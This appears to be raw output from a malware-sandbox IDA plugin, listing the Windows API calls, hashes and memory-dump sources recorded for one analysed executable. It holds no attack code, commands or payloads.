Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
  • API ID: ErrorLast$FilePointer
  • String ID:
  • API String ID: 1156039329-0
  • Opcode ID: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
  • Instruction ID: a22a311b57bf1dff13f45894218d9c0eaf9de3d8271a2984ee0ce7717fd7efee
  • Opcode Fuzzy Hash: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
  • Instruction Fuzzy Hash: E0E012B53042059BFB00FA6599C1F3B63DCDB44315F00447AB984CF187D674CC155B29
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
  • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
APIs
  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
  • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C756,?,00000000,?,?,0046C968,?,00000000,0046C9DC), ref: 0046C73A
  • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
  • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
Similarity
• API ID: Window$A5940CurrentEnablePathPrepareThreadWrite
• String ID:
• API String ID: 3104224314-0
APIs
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A11,00000000,00452A32,?,00000000), ref: 0042CD07
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
APIs
• CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                • Instruction ID: 00bf656f3cc58d957e3fc120c7d975a7f6f089e768df8f95d2ce2a55afbcf34e
                                                                                • Opcode Fuzzy Hash: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                • Instruction Fuzzy Hash: 69E07EB2600119AF9B40DE8CDC81EEB37ADAB1D350F414016FA08E7200C274EC519BB4
                                                                                APIs
                                                                                • FindClose.KERNEL32(00000000,000000FF,00470C14,00000000,00471A10,?,00000000,00471A59,?,00000000,00471B92,?,00000000,?,00000000), ref: 00454BFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                • Instruction ID: 3c3cb6916585ff7422749358fc170cdffb6a73b651657da6609ae8be1e4b77d0
                                                                                • Opcode Fuzzy Hash: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                • Instruction Fuzzy Hash: A7E065B0A056004BCB15DF3A858021A76D25FC5325F05C96AAC58CF397D63C84955656
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(004953B6,?,004953D8,?,?,00000000,004953B6,?,?), ref: 004146AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                APIs
                                                                                  • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                  • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 3202724764-0
                                                                                • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                APIs
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow
                                                                                • String ID:
                                                                                • API String ID: 530164218-0
                                                                                • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,004515B7,00000000), ref: 0042CD3F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                • Instruction ID: 866207c2a99293721dc17515f5e31636ca325c5e587501d47fbe5ff4e718b97c
                                                                                • Opcode Fuzzy Hash: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                • Instruction Fuzzy Hash: 77C08CE03222001A9A20A6BD2CC950F06CC891437A3A41F77B439E72E2D23DD8162018
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                • Opcode Fuzzy Hash: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                APIs
                                                                                • SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                  • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 734332943-0
                                                                                • Opcode ID: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                • Instruction ID: d892f33e09ba9bc7304af59ed1bd982b4427bde6cd355302a364b0e8927efaaf
                                                                                • Opcode Fuzzy Hash: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                • Instruction Fuzzy Hash: 2DC04CA9300101879F00BAAE95D190663D85E583057504066B944CF207D668D8144A18
                                                                                APIs
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID:
                                                                                • API String ID: 1611563598-0
                                                                                • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                                                • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                • Instruction ID: 3a42617683b163d9d3e29dc322e321d1f787465d7b697eb1a78dfeb7447b1e7e
                                                                                • Opcode Fuzzy Hash: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                • Instruction Fuzzy Hash: CB518574E042099FEB01EFA9C892AAEBBF5EF49314F50417AE500E7351DB389D45CB98
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047DC20,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 626452242-0
                                                                                • Opcode ID: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                • Instruction ID: a4a2cf2857c8d8ea8b604d5a3bb359359cf50968c17c86877c7e7666634e0114
                                                                                • Opcode Fuzzy Hash: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                • Instruction Fuzzy Hash: 79519C30A04248AFDB20DF65D8C5BAABBB8EB18304F118077E804A73A1D778AD45CB59
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                                                • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,00453019), ref: 00452FFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
